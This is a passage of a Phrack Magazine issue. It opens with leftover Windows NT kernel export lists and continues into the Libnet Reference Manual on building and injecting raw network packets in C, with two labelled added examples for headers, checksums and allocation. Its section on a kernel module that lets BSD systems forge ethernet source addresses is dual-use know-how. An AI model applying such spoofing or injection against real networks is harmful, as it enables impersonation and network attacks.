SeCreateClientSecurity
SeDeassignSecurity
SeDeleteAccessState
SeDeleteObjectAuditAlarm
SeExports
SeFreePrivileges
SeImpersonateClient
SeLockSubjectContext
SeMarkLogonSessionForTerminationNotification
SeOpenObjectAuditAlarm
SeOpenObjectForDeleteAuditAlarm
SePrivilegeCheck
SePrivilegeObjectAuditAlarm
SePublicDefaultDacl
SeQueryAuthenticationIdToken
SeQuerySecurityDescriptorInfo
SeRegisterLogonSessionTerminatedRoutine
SeReleaseSecurityDescriptor
SeReleaseSubjectContext
SeSetAccessStateGenericMapping
SeSetSecurityDescriptorInfo
SeSinglePrivilegeCheck
SeSystemDefaultDacl
SeTokenImpersonationLevel
SeTokenType
SeUnlockSubjectContext
SeUnregisterLogonSessionTerminatedRoutine
SeValidSecurityDescriptor
Here are the exported functions for the Object Manager:
ObAssignSecurity
ObCheckCreateObjectAccess
ObCheckObjectAccess
ObCreateObject
ObDereferenceObject
ObfDereferenceObject
ObFindHandleForObject
ObfReferenceObject
ObGetObjectPointerCount
ObGetObjectSecurity
ObInsertObject
ObMakeTemporaryObject
ObOpenObjectByName
ObOpenObjectByPointer
ObQueryNameString
ObQueryObjectAuditingByHandle
ObReferenceObjectByHandle
ObReferenceObjectByName
ObReferenceObjectByPointer
ObReleaseObjectSecurity
ObSetSecurityDescriptorInfo
Here are the exported functions for the IO Manager:
IoAcquireCancelSpinLock
IoAcquireVpbSpinLock
IoAdapterObjectType
IoAllocateAdapterChannel
IoAllocateController
IoAllocateErrorLogEntry
IoAllocateIrp
IoAllocateMdl
IoAssignResources
IoAttachDevice
IoAttachDeviceByPointer
IoAttachDeviceToDeviceStack
IoBuildAsynchronousFsdRequest
IoBuildDeviceIoControlRequest
IoBuildPartialMdl
IoBuildSynchronousFsdRequest
IoCallDriver
IoCancelIrp
IoCheckDesiredAccess
IoCheckEaBufferValidity
IoCheckFunctionAccess
IoCheckShareAccess
IoCompleteRequest
IoConnectInterrupt
IoCreateController
IoCreateDevice
IoCreateFile
IoCreateNotificationEvent
IoCreateStreamFileObject
IoCreateSymbolicLink
IoCreateSynchronizationEvent
IoCreateUnprotectedSymbolicLink
IoDeleteController
IoDeleteDevice
IoDeleteSymbolicLink
IoDetachDevice
IoDeviceHandlerObjectSize
IoDeviceHandlerObjectType
IoDeviceObjectType
IoDisconnectInterrupt
IoDriverObjectType
IoEnqueueIrp
IoFastQueryNetworkAttributes
IofCallDriver
IofCompleteRequest
IoFileObjectType
IoFreeController
IoFreeIrp
IoFreeMdl
IoGetAttachedDevice
IoGetBaseFileSystemDeviceObject
IoGetConfigurationInformation
IoGetCurrentProcess
IoGetDeviceObjectPointer
IoGetDeviceToVerify
IoGetFileObjectGenericMapping
IoGetInitialStack
IoGetRelatedDeviceObject
IoGetRequestorProcess
IoGetStackLimits
IoGetTopLevelIrp
IoInitializeIrp
IoInitializeTimer
IoIsOperationSynchronous
IoIsSystemThread
IoMakeAssociatedIrp
IoOpenDeviceInstanceKey
IoPageRead
IoQueryDeviceDescription
IoQueryDeviceEnumInfo
IoQueryFileInformation
IoQueryVolumeInformation
IoQueueThreadIrp
IoRaiseHardError
IoRaiseInformationalHardError
IoReadOperationCount
IoReadTransferCount
IoRegisterDriverReinitialization
IoRegisterFileSystem
IoRegisterFsRegistrationChange
IoRegisterShutdownNotification
IoReleaseCancelSpinLock
IoReleaseVpbSpinLock
IoRemoveShareAccess
IoReportHalResourceUsage
IoReportResourceUsage
IoSetDeviceToVerify
IoSetHardErrorOrVerifyDevice
IoSetInformation
IoSetShareAccess
IoSetThreadHardErrorMode
IoSetTopLevelIrp
IoStartNextPacket
IoStartNextPacketByKey
IoStartPacket
IoStartTimer
IoStatisticsLock
IoStopTimer
IoSynchronousPageWrite
IoThreadToProcess
IoUnregisterFileSystem
IoUnregisterFsRegistrationChange
IoUnregisterShutdownNotification
IoUpdateShareAccess
IoVerifyVolume
IoWriteErrorLogEntry
IoWriteOperationCount
IoWriteTransferCount
Here are the exported functions for the LSA:
LsaCallAuthenticationPackage
LsaDeregisterLogonProcess
LsaFreeReturnBuffer
LsaLogonUser
LsaLookupAuthenticationPackage
LsaRegisterLogonProcess
The only imports are from the HAL DLL:
HAL.ExAcquireFastMutex
HAL.ExReleaseFastMutex
HAL.ExTryToAcquireFastMutex
HAL.HalAllocateAdapterChannel
HAL.HalBeginSystemInterrupt
HAL.HalClearSoftwareInterrupt
HAL.HalDisableSystemInterrupt
HAL.HalDisplayString
HAL.HalEnableSystemInterrupt
HAL.HalEndSystemInterrupt
HAL.HalGetEnvironmentVariable
HAL.HalHandleNMI
HAL.HalProcessorIdle
HAL.HalQueryDisplayParameters
HAL.HalRequestSoftwareInterrupt
HAL.HalReturnToFirmware
HAL.HalSetEnvironmentVariable
HAL.HalSetRealTimeClock
HAL.HalStartProfileInterrupt
HAL.HalStopProfileInterrupt
HAL.HalSystemVectorDispatchEntry
HAL.KdPortPollByte
HAL.KdPortRestore
HAL.KdPortSave
HAL.KeGetCurrentIrql
HAL.KeLowerIrql
HAL.KeRaiseIrql
HAL.KeRaiseIrqlToDpcLevel
HAL.KeRaiseIrqlToSynchLevel
HAL.KfAcquireSpinLock
HAL.KfLowerIrql
HAL.KfRaiseIrql
HAL.KfReleaseSpinLock
HAL.READ_PORT_UCHAR
HAL.READ_PORT_ULONG
HAL.READ_PORT_USHORT
HAL.WRITE_PORT_UCHAR
HAL.WRITE_PORT_ULONG
HAL.WRITE_PORT_USHORT
----[ EOF
-------[ Phrack Magazine --- Vol. 9 | Issue 55 --- 09.09.99 --- 06 of 19 ]
-------------------------[ The Libnet Reference Manual v.01 ]
--------[ route <route@infonexus.com> ]
----[ 1] Impetus
If you are required to write C code (either by vocation or hobby) that at
some point, must inject packets into a network, and the traditionally
provided system APIs are insufficient, libnet is for you. Libnet provides
a simple API to quickly build portable programs that write network packets.
Libnet was written for two main reasons. 1) To establish a simple interface
by which network programmers could ignore the subtleties and nuances of
low-level network programming (and therefore concentrate on writing their
programs). 2) To mitigate the irritation many network programmers experienced
due to the lack of standards.
To be honest, I can't believe someone didn't write something like libnet
(also termed "libpwrite") a long time ago. It seemed like such an obvious
gap that needed to be filled. I was sure the LBNL guys (Lawrence Berkeley
National Laboratory -- they wrote libpcap[1]) would put something together.
I mean, Libnet, simply put, is the packet injector analog to libpcap. They
are brothers (or sisters).
To sum it up, this is a treatise on the art of manufacturing network packets
in an efficient, consistent and portable manner using libnet.
Libnet in and of itself, has nothing to do with security. However, libnet
is a wonderful utility for writing security-related applications, tools
and modules. Many recent exploits have been rapidly developed using libnet as
have many security related tools. Take a look at the libnet projects URL
section below for some examples.
----[ 2] Overview
Libnet is a simple C library. It is designed to be small, efficient and
easy to use. Libnet's main goal is portable packet creation and injection.
At the time this manual was written, Libnet was in version 0.99f and had 15
different packet assemblers and two types of packet injection, IP-layer and
link-layer (more on those below).
By itself, libnet is moderately useful. It can build and inject packets to
the network. Libnet, however, has no provisions for packet capture. For
this, one must look to libpcap. Together, libnet and libpcap are powerful
tools available to the network programmer.
Libnet consists of about:
- 7300 lines of code
- 32 source files
- 5 include files
- ~54 functions
- ~43 user-accessible / implemented functions
----[ 3] Design Decisions (past, present and future)
Libnet is very much an ongoing learning/research project. When I started
it over a year and a half ago, I had no idea it would grow as it did
incorporating as much functionality as it does. Libnet's design has changed
not so much in stages, but rather in evolutions. Many of these evolutionary
changes I took from other successful libraries out there. Some of the changes
are hard to pass and are still in progress, while some were just simple
internal changes. Then there were some modifications to the library that
unfortunately changed the interface and obsoleted older versions. In this
section I hope to enlighten the reader as to some of the design decisions that go
into libnet; where it was, where it is, and where it's going.
Modularity (interfaces and implementations)
-------------------------------------------
Big programs are made up of many modules [3]. These modules provide the user
with functions and data structures that are to be used in a program. A module
comes in two parts: its interface and its implementation. The interface
specifies what a module does, while the implementation specifies how the
module does it. The interface declares all of the data types, function
prototypes, global information, macros, or whatever is required by the module.
The implementation adheres to the specifications set forth by the interface.
This is how libnet was and is designed. Each implementation, you'll find,
has a corresponding interface.
There is a third piece of this puzzle: the client. The client is the piece
of code that imports and employs the interface, without having to even see
the implementation. Your code is the client.
For more information on interfaces and implementations in C, I urge the reader
to check out [3]. It's an excellent book that changed the way I wrote code.
Nomenclature
------------
Initially, the naming of files, functions and other tidbits didn't seem to
be that important. They took on whatever names seemed appropriate at the
time. In a stand-alone program, this is bad style. In a library, it's bad
style AND potentially error-prone. Library code is intended to be used on
different platforms and potentially with other libraries. If one of these
other libraries (or potentially the user's code) contains an object with the
same name, problems result. Therefore, naming has become an important issue
to me. A strict naming convention helps in two major areas:
- for filenames it keeps them ordered in a directory making for easy
perusal
- for function names, macros, and symbols it cuts down on redefinition
problems and makes the interface much easier to learn
Error Handling and Reporting
----------------------------
Error handling and reporting is an essential part of any programming
paradigm. Delicate handling of and recovery from error conditions is an
absolute necessity, especially in a third party library. I believe Libnet
now has decent error handling (see below for a dissertation on assertions).
It can recover from most bad situations more or less gracefully. It
checks for illegal conditions under most circumstances. Reporting, however,
is a different story and is still progressing. Libnet needs to have a standard
error reporting convention in place. As it stands now, some functions use
errno (since they are basically system call wrappers), while some accept
an additional buffer argument to hold potential error messages, and still
others as yet have no provision for verbose error reporting. This needs to
change and possibly might be accomplished using variable argument lists.
Assertions and Exit Points
--------------------------
assert(3) is a macro that accepts a single argument which it treats as an
expression, evaluating it for truth. If the expression is evaluated to be
false, the assert macro prints an error message and aborts (terminates) the
program. Assertions are useful in the developmental stages of programs when
verbose error handling is not in place or when a grievous error condition
that normally should not happen occurs. Initially libnet was riddled with
assertions. Libnet mainly employed assertions to catch NULL pointer
dereferences before they occurred (many libnet functions accept pointer
arguments expecting them to actually point somewhere). This seemed reasonable
at the time because this is obviously a grievous error -- if you're passing a
NULL pointer when you shouldn't, your program is probably going to crash.
However, assertions also riddled the library with numerous potential
unpredictable exit points. Exit points inside a supplementary library such as
libnet are bad style, let alone unpredictable exit points. Library code should
not cause or allow a program to exit. If a grievous error condition is
detected, the library should return error codes to the main, and let it decide
what to do. Code should be able to handle grievous errors well enough to be
able to exit gracefully from the top level (if possible). In any event, the
assertions were removed in version 0.99f in favor of error indicative return
values. This preserves compatibility, while removing the exit points.
IPv4 vs IPv6
------------
Libnet currently only supports IPv4. Support for IPv6 is definitely
planned, however. The main consideration is nomenclature. Had I been
mister-cool-smart guy in the beginning, I would have anticipated this and
added IP version information to the function names and macros e.g.:
ipv4_build_ip, IPV4_H. However at this point, I refuse to force users to
adapt to yet another interface, so the IPv6 functions and macros will contain
IPv6 in the name (much like the POSIX 1.g sockets interface [2]).
The Configure Script
--------------------
Early on in the development of libnet, it became clear that there was much
OS and architecture dependent code that had to be conditionally included and
compiled. The autoconf configuration stuff (circa version 0.7) worked great to
determine what needed to be included and excluded in order to build the
library, but did nothing for post-install support. Many of these CPP macros
were needed to conditionally include header information for user-based code.
This was initially handled by relying on the user to define the proper macros,
but this quickly proved inefficient.
Libnet now employs a simple configure script. This script is created during
autoconf configuration and is installed when the library is installed. It
handles all of the OS and architecture dependencies automatically - however,
it is now mandatory to use it. You will not be able to compile libnet-based
code without it. See the next section for details on how to invoke the script.
----[ 4] A Means to an Ends
This section covers operational issues including how to employ the library in
a useful manner as well as noting some of its quirks.
The Order of Operations
-----------------------
In order to build and inject an arbitrary network packet, there is a standard
order of operations to be followed. There are five easy steps to packet
injection happiness:
1) Network initialization
2) Memory initialization
3) Packet construction
4) Packet checksums
5) Packet injection
Each one of these is an important topic and is covered below.
Memory allocation and initialization
------------------------------------
The first step in using libnet is to allocate memory for a packet. The
conventional way to do this is via a call to libnet_init_packet(). You just
need to make sure you specify enough memory for whatever packet you're going
to build. This will also require some forethought as to which injection method
you're going to use (see below for more information). If you're going to
build a simple TCP packet (sans options) with a 30 byte payload using the
IP-layer interface, you'll need 70 bytes (IP header + TCP header + payload).
If you're going to build the same packet using the link-layer interface, you'll
need 84 bytes (ethernet header + IP header + TCP header + payload). To be
safe you can simply allocate IP_MAXPACKET bytes (65535) and not worry about
overwriting buffer boundaries. When finished with the memory, it should be
released with a call to libnet_destroy_packet() (this can either be in a
garbage collection function or at the end of the program).
Another method of memory allocation is via the arena interface. Arenas are
basically memory pools that allocate large chunks of memory in one call,
divvy out chunks as needed, then deallocate the whole pool when done. The
libnet arena interface is useful when you want to preload different kinds
of packets that you're potentially going to be writing in rapid succession.
It is initialized with a call to libnet_init_packet_arena() and chunks are
retrieved with libnet_next_packet_from_arena(). When finished with the memory
it should be released with a call to libnet_destroy_packet_arena() (this can
either be in a garbage collection function or at the end of the program).
An important note regarding memory management and packet construction: If you
do not allocate enough memory for the type of packet you're building, your
program will probably segfault on you. Libnet can detect when you haven't
passed *any* memory, but not when you haven't passed enough. Take heed.
Network initialization
----------------------
The next step is to bring up the network injection interface. With the
IP-layer interface, this is with a call to libnet_open_raw_sock() with the
appropriate protocol (usually IPPROTO_RAW). This call will return a raw
socket with IP_HDRINCL set on the socket telling the kernel you're going
to build the IP header.
The link-layer interface is brought up with a call to
libnet_open_link_interface() with the proper device argument. This will
return a pointer to a ready to go link interface structure.
Packet construction
-------------------
Packets are constructed modularly. For each protocol layer, there should
be a corresponding call to a libnet_build function. Depending on your
end goal, different things may happen here. For the above IP-layer example,
calls to libnet_build_ip() and libnet_build_tcp() will be made. For the
link-layer example, an additional call to libnet_build_ethernet() will be
made. The ordering of the packet constructor function calls is not important,
it is only important that the correct memory locations be passed to these
functions. The functions need to build the packet headers inside the buffer
as they would appear on the wire and be demultiplexed by the recipient.
For example:
          14 bytes         20 bytes             20 bytes
      __________________________________________________________
     |   ethernet   |         IP         |        TCP         |
     |______________|____________________|____________________|
libnet_build_ethernet() would be passed the whole buffer (as it needs to build
an ethernet header at the front of the packet). libnet_build_ip() would get
the buffer 14 bytes (ETH_H) beyond this to construct the IP header in the
correct location, while libnet_build_tcp() would get the buffer 20 bytes
beyond this (or 34 bytes beyond the beginning (ETH_H + IP_H)). This is
easily apparent in the example code.
Packet checksums
----------------
The next-to-last step is computing the packet checksums (assuming the packet
is an IP packet of some sort). For the IP-layer interface, we need only
compute a transport layer checksum (assuming our packet has a transport
layer protocol) as the kernel will handle our IP checksum. For the link-layer
interface, the IP checksum must be explicitly computed. Checksums are
calculated via libnet_do_checksum(), which will be expecting the buffer passed
to point to the IP header of the packet.
Packet injection
----------------
The last step is to write the packet to the network. Using the IP-layer
interface this is accomplished with libnet_write_ip(), and with the link-layer
interface it is accomplished with libnet_write_link_layer(). The functions
return the number of bytes written (which should jive with the size of your
packet) or a -1 on error.
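The following is an added example, not code from the article or from libnet
itself, that walks steps 2 through 4 above without linking against libnet:
it works out the buffer size for the 30 byte payload case (70 bytes IP-layer,
84 bytes link-layer), writes the ethernet, IP and TCP headers at the 0, 14 and
34 byte offsets of one buffer, and fills in the checksums under the same
contract as libnet_do_checksum() (buffer points at the IP header; the IP
checksum is only computed because the frame is destined for the link-layer
interface). Step 5, injection, is deliberately left out so it runs offline.
The MAC addresses, IP addresses, ports and payload are constructed values, the
ETH_H/IP_H/TCP_H names mirror libnet's macros, and PROTO_IP/PROTO_TCP stand in
for IPPROTO_IP/IPPROTO_TCP. The checksum_ok() check at the end does what a
receiver does: a header summed together with its own checksum folds to zero.

```c
#include <stdint.h>
#include <string.h>
#include <stdio.h>

#define ETH_H 14      /* header sizes, named as libnet names them */
#define IP_H  20
#define TCP_H 20
#define PROTO_IP  0   /* the values of IPPROTO_IP and IPPROTO_TCP */
#define PROTO_TCP 6

/* Step 2: bytes to allocate for a TCP packet without options. */
size_t required_size(int link_layer, size_t payload_len)
{
    return (link_layer ? ETH_H : 0) + IP_H + TCP_H + payload_len;
}

static void put16(uint8_t *p, uint16_t v) { p[0] = v >> 8; p[1] = v & 0xff; }
static void put32(uint8_t *p, uint32_t v) { put16(p, v >> 16); put16(p + 2, v & 0xffff); }

/* RFC 1071 one's complement sum, accumulated on top of sum, and its fold. */
static uint32_t ones_sum(const uint8_t *p, size_t len, uint32_t sum)
{
    for (; len > 1; p += 2, len -= 2) sum += (uint32_t)p[0] << 8 | p[1];
    if (len) sum += (uint32_t)p[0] << 8;
    return sum;
}
static uint16_t fold(uint32_t sum)
{
    while (sum >> 16) sum = (sum & 0xffff) + (sum >> 16);
    return (uint16_t)~sum;
}

/* Step 3: each header is written at its own offset into the one buffer,
 * checksum fields left zero. */
void build_ip(uint8_t *ip, uint16_t tot_len, uint8_t proto, uint32_t src, uint32_t dst)
{
    memset(ip, 0, IP_H);
    ip[0] = 0x45; ip[8] = 64; ip[9] = proto;     /* v4, IHL 5, TTL 64 */
    put16(ip + 2, tot_len); put32(ip + 12, src); put32(ip + 16, dst);
}
void build_tcp(uint8_t *tcp, uint16_t sport, uint16_t dport, uint32_t seq, uint8_t flags)
{
    memset(tcp, 0, TCP_H);
    put16(tcp, sport); put16(tcp + 2, dport); put32(tcp + 4, seq);
    tcp[12] = 5 << 4; tcp[13] = flags; put16(tcp + 14, 8192);  /* offset 5, window */
}

/* The pseudo-header the TCP checksum also covers, read from the IP header. */
static uint32_t pseudo_sum(const uint8_t *ip, size_t tcp_len)
{
    uint8_t ph[12];
    memcpy(ph, ip + 12, 8); ph[8] = 0; ph[9] = PROTO_TCP; put16(ph + 10, (uint16_t)tcp_len);
    return ones_sum(ph, 12, 0);
}

/* Step 4 with libnet_do_checksum()'s contract: ip points at the IP header;
 * for PROTO_IP len is IP_H, for PROTO_TCP len excludes IP_H. */
int do_checksum(uint8_t *ip, int proto, size_t len)
{
    uint8_t *field, *start; uint32_t seed;
    if (proto == PROTO_IP)       { field = ip + 10;        start = ip;        seed = 0; }
    else if (proto == PROTO_TCP) { field = ip + IP_H + 16; start = ip + IP_H; seed = pseudo_sum(ip, len); }
    else return -1;                              /* unsupported protocol */
    put16(field, 0);
    put16(field, fold(ones_sum(start, len, seed)));
    return 1;
}

/* Receiver-side check: a header summed together with its checksum folds to 0. */
int checksum_ok(const uint8_t *ip, int proto, size_t len)
{
    if (proto == PROTO_IP) return fold(ones_sum(ip, len, 0)) == 0;
    return fold(ones_sum(ip + IP_H, len, pseudo_sum(ip, len))) == 0;
}

/* The article's link-layer example: 14 + 20 + 20 + 30 = 84 bytes. Returns 0
 * when the buffer is too small, the mistake libnet itself cannot catch. */
size_t build_example_frame(uint8_t *buf, size_t buflen)
{
    static const uint8_t dst_mac[6] = {0x00,0x11,0x22,0x33,0x44,0x55};  /* constructed */
    static const uint8_t src_mac[6] = {0x00,0x66,0x77,0x88,0x99,0xaa};  /* constructed */
    size_t need = required_size(1, 30);
    uint8_t *ip, *tcp;
    if (buflen < need) return 0;
    ip = buf + ETH_H; tcp = ip + IP_H;                       /* 14 and 34 bytes in */
    memcpy(buf, dst_mac, 6); memcpy(buf + 6, src_mac, 6); put16(buf + 12, 0x0800); /* ETHERTYPE_IP */
    build_ip(ip, IP_H + TCP_H + 30, PROTO_TCP, 0x0a000001u, 0x0a000002u); /* 10.0.0.1 -> 10.0.0.2 */
    build_tcp(tcp, 40000, 80, 1000, 0x02);                                /* SYN */
    memset(tcp + TCP_H, 'A', 30);                                         /* constructed payload */
    do_checksum(ip, PROTO_TCP, TCP_H + 30);   /* needed with both interfaces */
    do_checksum(ip, PROTO_IP, IP_H);          /* link-layer only; raw sockets do it in-kernel */
    return need;
}

int example_checksums_verify(void)
{
    uint8_t buf[128];
    return build_example_frame(buf, sizeof buf) == 84
        && checksum_ok(buf + ETH_H, PROTO_IP, IP_H)
        && checksum_ok(buf + ETH_H, PROTO_TCP, TCP_H + 30);
}

int main(void)
{
    printf("IP-layer %zu bytes, link-layer %zu bytes, checksums %s\n", required_size(0, 30),
           required_size(1, 30), example_checksums_verify() ? "verify" : "FAIL");
    return 0;
}
```

Note the two different meanings of the length argument: for the transport
checksum it is the TCP header plus payload (50 here), for the IP checksum it
is IP_H, exactly the distinction the libnet_do_checksum() reference below
draws. If the TCP checksum were computed after patching any of the addresses
in the IP header it would be wrong, since the pseudo-header is read from there.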
Using the Configure Script
--------------------------
There has been some confusion on how to correctly implement the
libnet-configure shell script. Since 0.99e, it has become mandatory to use
this script. The library will not compile code without it. This is to avoid
potential problems when user code is compiled with improper or missing CPP
macros. The script also has provisions for specifying libraries and cflags.
The library switch is useful on architectures that require additional
libraries to compile network code (such as Solaris). The script is very
simple to use. The following examples should dispel any confusion:
At the command line you can run the script to see what defines are
used for that system:
shattered:~> libnet-config --defines
-D_BSD_SOURCE -D__BSD_SOURCE -D__FAVOR_BSD -DHAVE_NET_ETHERNET_H
-DLIBNET_LIL_ENDIAN
shattered:~> gcc -Wall `libnet-config --defines` foo.c -o foo
`libnet-config --libs`
In a Makefile:
DEFINES = `libnet-config --defines`
In a Makefile.in (also employing autoheader):
DEFINES = `libnet-config --defines` @DEFS@
IP-layer vs. Link-layer
-----------------------
People often wonder when to use the link-layer interface in place of the
IP-layer interface. It's mainly trading of power and complexity for ease of
use. The link-layer interface is slightly more complex and requires more
coding. It's also more powerful and is a lot more portable (if you want
to build ARP/RARP/ethernet frames it's the only way to go). It is basically
a matter of what you need to get done.
One major issue with the link-layer interface is that in order to send packets
to arbitrary remote Internet hosts, it needs to know the MAC address of the
first hop router. This is accomplished via ARP packets, but if proxy ARP
isn't being done, you run into all kinds of problems determining whose MAC
address to request. Code to portably alleviate this problem is being
developed.
Spoofing Ethernet Addresses
---------------------------
Certain operating systems (specifically ones that use the Berkeley Packet
Filter for link-layer access) do not allow for arbitrary specification of
source ethernet addresses. This is not so much a bug as it is an oversight
in the protocol. The way around this is to patch the kernel. There are two
ways to patch a kernel, either statically, with kernel diffs (which requires
the individual to have the kernel sources, and know how to rebuild and install
a new kernel) or dynamically, with loadable kernel modules (lkms). Since it's
a bit overzealous to assume people will want to patch their kernel for a
library, included with the libnet distribution is lkm code to seamlessly
bypass the bpf restriction.
In order to spoof ethernet packets on bpf-based systems (currently supported
are FreeBSD and OpenBSD) do the following: cd to the proper support/bpf-lkm/
directory, build the module, and modload it.
The module works as per the following description:
The 4.4BSD machine-independent ethernet driver does not allow upper layers
to forge the ethernet source address; all ethernet outputs cause the output
routine to build a new ethernet header, and the process that does this
explicitly copies the MAC address registered to the interface into this header.
This is odd, because the bpf writing convention asserts that writes to bpf
must include a link-layer header; it's intuitive to assume that this header
is, along with the rest of the packet data, written to the wire.
This is not the case. The link-layer header is used solely by the
bpf code in order to build a sockaddr structure that is passed to the generic
ethernet output routine; the header is then effectively stripped off the
packet. The ethernet output routine consults this sockaddr to obtain the
ethernet type and destination address, but not the source address.
The Libnet lkm simply replaces the standard ethernet output routine with a
slightly modified one. This modified version retrieves the source ethernet
address from the sockaddr and uses it as the source address for the header
written to the wire. This allows bpf to be used to seamlessly forge ethernet
packets in their entirety, which has applications in address management.
The modload glue provided traverses the global list of system interfaces,
and replaces any pointer to the original ethernet output routine with the
new one we've provided. The unload glue undoes this. The effect of loading
this module will be that all ethernet interfaces on the system will support
source address forging.
Thomas H. Ptacek wrote the first version of this lkm in 1997.
Raw Sockets Limitations
-----------------------
Raw sockets are horribly non-standard across different platforms.
- Under some x86 BSD implementations the IP header length and fragmentation
bits need to be in host byte order, and under others, network byte order.
- Solaris does not allow you to set many IP header related bits including
the length, fragmentation flags, or IP options.
- Linux, on the other hand, seems to allow the setting of any bits to any
value (the exception being the IP header checksum, which is always done
by the kernel -- regardless of OS type).
Because of these quirks, unless your code is deliberately single-platform,
you should use libnet's link-layer interface instead.
----[ 5] Internals
Libnet can be broken down into 4 basic sections: memory management, address
resolution, packet handling, and support. In this section we cover every
user-accessible function libnet has to offer.
Preceding each function prototype is a small reference chart listing the
return values of the function, whether or not the function is reentrant (a
function is considered reentrant if it may be called repeatedly, or may be
called before previous invocations have completed, and each invocation is
independent of all other invocations) and a brief description of the function's
arguments.
If you're wondering, yes, this is basically a verbose manpage, however, much of
it is new and additional verbiage, supplemental to the existing manual page.
Memory Management Functions
---------------------------
int libnet_init_packet(u_short, u_char **);
RV on success: 1
RV on failure: -1
Re-entrant: yes
Arguments: 1 - desired packet size
2 - pointer to a character pointer to contain packet memory
libnet_init_packet() creates memory for a packet. Well, it doesn't so much
create memory as it requests it from the OS. It does, however, make
certain the memory is zero-filled. The function accepts two arguments, the
packet size and the address of the pointer to the packet. The packet size
parameter may be 0, in which case the library will attempt to guess a
packet size for you. The pointer to a pointer is necessary as we are
allocating memory locally. If we simply pass in a pointer (even though
we are passing in an address, we are referencing the value as a pointer --
so in essence we would be passing by value) the memory will be lost. If
we pass by address, we will retain the requested heap memory.
This function is a good example of interface hiding. This function is
essentially a malloc() wrapper. By using this function the details of
what's really happening are abstracted so that you, the programmer, can
worry about your task at hand.
void libnet_destroy_packet(u_char **);
RV on success: NA
RV on failure: NA
Reentrant: yes
Arguments: 1 - pointer to a character pointer containing packet
memory
libnet_destroy_packet() is the free() analog to libnet_init_packet. It
destroys the packet referenced by 'buf'. In reality, it is of course a
simple free() wrapper. It frees the heap memory and points `buf` to NULL
to dispel the dangling pointer. The function does make the assertion that
`buf` is not NULL. A pointer to a pointer is passed to maintain
interface consistency.
int libnet_init_packet_arena(struct libnet_arena **, u_short, u_short);
RV on success: 1
RV on failure: -1
Reentrant: yes
Arguments: 1 - pointer to an arena pointer (preallocated arena)
2 - number of packets
3 - packet size
libnet_init_packet_arena() allocates and initializes a memory pool.
If you plan on building and sending several different packets, this is
a good choice. It allocates a pool of memory from which you can grab
chunks to build packets (see libnet_next_packet_from_arena()). It takes the
address to an arena structure pointer, and hints on the possible packet
size and number of packets. The last two arguments are used to compute
the size of the memory pool. As before, they can be set to 0 and the
library will attempt to choose a decent value. The function returns -1
if the malloc fails or 1 if everything goes ok.
u_char *libnet_next_packet_from_arena(struct libnet_arena **, u_short);
RV on success: pointer to the requested packet memory
RV on failure: NULL
Reentrant: yes
Arguments: 1 - pointer to an arena pointer
2 - requested packet size
libnet_next_packet_from_arena() returns a chunk of memory from the
specified arena of the requested size and decrements the available
byte counter. If the requested memory is not available from the arena, the
function returns NULL. Note that there is nothing preventing a poorly
coded application from using more memory than requested and causing
all kinds of problems. Take heed.
void libnet_destroy_packet_arena(struct libnet_arena **);
RV on success: NA
RV on failure: NA
Reentrant: yes
Arguments: 1 - pointer to an arena pointer
libnet_destroy_packet_arena() frees the memory associated with the
specified arena.
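As an added illustration of the contracts described above (this is a
re-implementation written for this section, not libnet's source), here are
both allocation interfaces side by side. init_packet() shows why the address
of the pointer is passed: a by-value variant is included to show the caller's
pointer staying NULL. The arena carves one allocation into chunks and returns
NULL once the pool is spent; nothing, as the text warns, stops a caller from
writing past the chunk it was given. The 1500 byte and 3 packet fallbacks for
a size of 0 are assumptions, not libnet's actual guesses.

```c
#include <stdlib.h>
#include <string.h>
#include <stdio.h>

/* Allocate zero-filled packet memory, passing the pointer by address.
 * A size of 0 falls back to an assumed 1500 byte guess. */
int init_packet(unsigned short size, unsigned char **buf)
{
    if (buf == NULL) return -1;           /* error return, not an assertion */
    if (size == 0) size = 1500;
    *buf = calloc(1, size);
    return *buf != NULL ? 1 : -1;
}

/* free() wrapper that also clears the caller's pointer. */
void destroy_packet(unsigned char **buf)
{
    if (buf == NULL || *buf == NULL) return;
    free(*buf);
    *buf = NULL;
}

/* The wrong interface: the pointer passed by value is a copy, so the
 * caller's own pointer is still NULL when this returns. */
static void init_packet_by_value(unsigned short size, unsigned char *buf)
{
    buf = calloc(1, size);
    free(buf);                            /* would otherwise leak */
}

int by_value_leaves_caller_null(void)
{
    unsigned char *p = NULL;
    init_packet_by_value(64, p);
    return p == NULL;
}

int by_address_hands_back_memory(void)
{
    unsigned char *p = NULL;
    int ok = init_packet(64, &p) == 1 && p != NULL && p[0] == 0;
    destroy_packet(&p);
    return ok && p == NULL;               /* no dangling pointer left behind */
}

/* Arena: one allocation carved into chunks, freed in one go. */
struct arena {
    unsigned char *pool;
    size_t size;      /* bytes in the pool */
    size_t used;      /* bytes handed out */
};

int init_packet_arena(struct arena **a, unsigned short npackets, unsigned short psize)
{
    if (a == NULL) return -1;
    if (npackets == 0) npackets = 3;      /* assumed defaults for the 0 hints */
    if (psize == 0) psize = 1500;
    *a = malloc(sizeof **a);
    if (*a == NULL) return -1;
    (*a)->size = (size_t)npackets * psize;
    (*a)->used = 0;
    (*a)->pool = calloc(1, (*a)->size);
    if ((*a)->pool == NULL) { free(*a); *a = NULL; return -1; }
    return 1;
}

/* Hands out the next chunk, or NULL when the pool is exhausted. */
unsigned char *next_packet_from_arena(struct arena **a, unsigned short size)
{
    struct arena *ar = (a != NULL) ? *a : NULL;
    unsigned char *p;
    if (ar == NULL || size == 0 || ar->size - ar->used < size) return NULL;
    p = ar->pool + ar->used;
    ar->used += size;
    return p;
}

void destroy_packet_arena(struct arena **a)
{
    if (a == NULL || *a == NULL) return;
    free((*a)->pool);
    free(*a);
    *a = NULL;
}

/* Ask a 3 x 100 byte arena for four 100 byte chunks: three succeed. */
int arena_chunks_obtained(void)
{
    struct arena *a = NULL;
    int i, got = 0;
    if (init_packet_arena(&a, 3, 100) != 1) return -1;
    for (i = 0; i < 4; i++)
        if (next_packet_from_arena(&a, 100) != NULL) got++;
    destroy_packet_arena(&a);
    return got;
}

int main(void)
{
    printf("by value: %d  by address: %d  arena chunks: %d\n",
           by_value_leaves_caller_null(), by_address_hands_back_memory(),
           arena_chunks_obtained());
    return 0;
}
```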
Address Resolution Functions
----------------------------
u_char *libnet_host_lookup(u_long, u_short);
RV on success: human readable IP address
RV on failure: NULL
Reentrant: no
Arguments: 1 - network-byte ordered IP address
2 - flag to specify whether or not to look up canonical
hostnames (symbolic constant)
libnet_host_lookup() converts the supplied network-ordered (big-endian)
IP address into its human-readable counterpart. If the usename flag is
LIBNET_RESOLVE, the function will attempt to resolve the IP address
